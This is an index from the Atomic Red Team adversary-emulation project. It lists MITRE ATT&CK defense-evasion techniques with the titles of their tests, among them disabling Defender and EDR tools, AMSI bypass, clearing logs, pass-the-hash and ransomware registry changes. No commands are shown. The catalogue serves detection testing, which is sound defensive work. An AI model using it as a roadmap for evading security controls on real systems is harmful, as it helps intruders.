- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable Microsoft Defender Firewall [windows]
- Atomic Test #2: Disable Microsoft Defender Firewall via Registry [windows]
- Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
- Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- Atomic Test #7: Stop/Start UFW firewall [linux]
- Atomic Test #8: Stop/Start UFW firewall systemctl [linux]
- Atomic Test #9: Turn off UFW logging [linux]
- Atomic Test #10: Add and delete UFW firewall rules [linux]
- Atomic Test #11: Edit UFW firewall user.rules file [linux]
- Atomic Test #12: Edit UFW firewall ufw.conf file [linux]
- Atomic Test #13: Edit UFW firewall sysctl.conf file [linux]
- Atomic Test #14: Edit UFW firewall main configuration file [linux]
- Atomic Test #15: Tail the UFW firewall log file [linux]
- Atomic Test #16: LockBit Black - Unusual Windows firewall registry modification -cmd [windows]
- Atomic Test #17: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows]
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1207 Rogue Domain Controller](../../T1207/T1207.md)
- Atomic Test #1: DCShadow (Active Directory) [windows]
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1610 Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1112 Modify Registry](../../T1112/T1112.md)
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify registry to store logon credentials [windows]
- Atomic Test #4: Add domain to Trusted sites Zone [windows]
- Atomic Test #5: Javascript in registry [windows]
- Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
- Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
- Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
- Atomic Test #9: Disable Windows Registry Tool [windows]
- Atomic Test #10: Disable Windows CMD application [windows]
- Atomic Test #11: Disable Windows Task Manager application [windows]
- Atomic Test #12: Disable Windows Notification Center [windows]
- Atomic Test #13: Disable Windows Shutdown Button [windows]
- Atomic Test #14: Disable Windows LogOff Button [windows]
- Atomic Test #15: Disable Windows Change Password Feature [windows]
- Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
- Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
- Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
- Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
- Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
- Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
- Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
- Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
- Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
- Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
- Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
- Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
- Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
- Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
- Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
- Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
- Atomic Test #32: Windows Powershell Logging Disabled [windows]
- Atomic Test #33: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
- Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
- Atomic Test #35: Disable Windows Toast Notifications [windows]
- Atomic Test #36: Disable Windows Security Center Notifications [windows]
- Atomic Test #37: Suppress Win Defender Notifications [windows]
- Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
- Atomic Test #39: NetWire RAT Registry Key Creation [windows]
- Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
- Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
- Atomic Test #42: Disable Windows Error Reporting Settings [windows]
- Atomic Test #43: DisallowRun Execution Of Certain Applications [windows]
- Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1085 Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- [T1070.001 Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
- Atomic Test #3: Clear Event Logs via VBA [windows]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1054 Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.008 Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- Atomic Test #2: Odbcconf.exe - Load Response File [windows]
- T1144 Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Logging Configuration Changes on Linux Host [linux]
- Atomic Test #3: Disable Powershell ETW Provider - Windows [windows]
- Atomic Test #4: Disable .NET Event Tracing for Windows Via Registry (cmd) [windows]
- Atomic Test #5: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
- Atomic Test #6: LockBit Black - Disable the ETW Provider of Windows Defender -cmd [windows]
- Atomic Test #7: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell [windows]
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
- Atomic Test #1: Indicator Removal using FSUtil [windows]
- [T1550.003 Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- [T1036.004 Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
- Atomic Test #2: Creating W32Time similar named service using sc [windows]
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- [T1647 Plist File Modification](../../T1647/T1647.md)
- Atomic Test #1: Plist Modification [macos]
- T1191 CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
- Atomic Test #1: Mount ISO image [windows]
- Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
- Atomic Test #3: Remove the Zone.Identifier alternate data stream [windows]
- Atomic Test #4: Execute LNK file from ISO [windows]
- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1612 Build Image on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.005 Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
- Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows]
- Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows]
- Atomic Test #6: Invoke HTML Application - Direct download from URI [windows]
- Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
- Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
- Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- Atomic Test #10: Mshta used to Execute PowerShell [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.001 Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- Atomic Test #3: Launch NSudo Executable [windows]
- Atomic Test #4: Bad Potato [windows]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
- Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
- Atomic Test #2: Create Hidden User using IsHidden option [macos]
- Atomic Test #3: Create Hidden User in Registry [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1502 Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.001 Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
- Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
- Atomic Test #5: Invoke CHM Simulate Double click [windows]
- Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
- Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- Atomic Test #8: Decompile Local CHM File [windows]
- [T1070.005 Indicator Removal on Host: Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
- Atomic Test #4: Disable Administrative Share Creation at Startup [windows]
- Atomic Test #5: Remove Administrative Shares [windows]
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable Cb Response [linux]
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
- Atomic Test #8: Disable macOS Gatekeeper [macos]
- Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos]
- Atomic Test #10: Unload Sysmon Filter Driver [windows]
- Atomic Test #11: Uninstall Sysmon [windows]
- Atomic Test #12: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #13: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #14: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #15: Tamper with Windows Defender ATP PowerShell [windows]
- Atomic Test #16: Tamper with Windows Defender Command Prompt [windows]
- Atomic Test #17: Tamper with Windows Defender Registry [windows]
- Atomic Test #18: Disable Microsoft Office Security Features [windows]
- Atomic Test #19: Remove Windows Defender Definition Files [windows]
- Atomic Test #20: Stop and Remove Arbitrary Security Windows Service [windows]
- Atomic Test #21: Uninstall Crowdstrike Falcon on Windows [windows]
- Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
- Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
- Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
- Atomic Test #26: Disable Windows Defender with DISM [windows]
- Atomic Test #27: Disable Defender with Defender Control [windows]
- Atomic Test #28: Disable Defender Using NirSoft AdvancedRun [windows]
- Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
- Atomic Test #30: WinPwn - Kill the event log services for stealth [windows]
- Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
- Atomic Test #32: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd [windows]
- Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd [windows]
- Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
- Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
- Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
- Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
- T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1073 DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
- Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
- Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
- Atomic Test #7: Obfuscated Command in PowerShell [windows]
- Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
- Atomic Test #1: Register Portable Virtualbox [windows]
- Atomic Test #2: Create and start VirtualBox virtual machine [windows]
- Atomic Test #3: Create and start Hyper-V virtual machine [windows]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.010 Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md)
- Atomic Test #1: Regsvr32 local COM scriptlet execution [windows]
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- Atomic Test #4: Regsvr32 Registering Non DLL [windows]
- Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #2: Masquerading as Linux crond process. [linux]
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
- Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
- Atomic Test #6: Masquerading - non-windows exe running as windows exe [windows]
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- Atomic Test #9: File Extension Masquerading [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1186 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm](../../T1218.009/T1218.009.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
- Atomic Test #3: Install root CA on macOS [macos]
- Atomic Test #4: Install root CA on Windows [windows]
- Atomic Test #5: Install root CA on Windows with certutil [windows]
- Atomic Test #6: Add Root Certificate to CurrentUser Certificate Store [windows]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- Atomic Test #2: Dynamic C# Compile [windows]
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.008 Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md)
- Atomic Test #1: AWS - CloudTrail Changes [iaas:aws]
- Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
- Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
- Atomic Test #4: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus [linux, macos]
- Atomic Test #5: AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus [linux, macos]
- Atomic Test #6: AWS - Remove VPC Flow Logs using Stratus [linux, macos]
- Atomic Test #7: AWS - CloudWatch Log Group Deletes [iaas:aws]
- Atomic Test #8: AWS - CloudWatch Log Stream Deletes [iaas:aws]
- Atomic Test #9: AWS CloudWatch Log Stream Deletes [iaas:aws]
- [T1564.003 Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.002 Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1146 Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- Atomic Test #9: Delete Prefetch File [windows]
- Atomic Test #10: Delete TeamViewer Log Files [windows]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1221 Template Injection](../../T1221/T1221.md)
- Atomic Test #1: WINWORD Remote Template Injection [windows]
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #1: Binary simply packed by UPX (linux) [linux]
- Atomic Test #2: Binary packed by UPX, with modified headers (linux) [linux]
- Atomic Test #3: Binary simply packed by UPX [macos]
- Atomic Test #4: Binary packed by UPX, with modified headers [macos]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #1: Space After Filename (Manual) [macos]
- Atomic Test #2: Space After Filename [macos, linux]
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
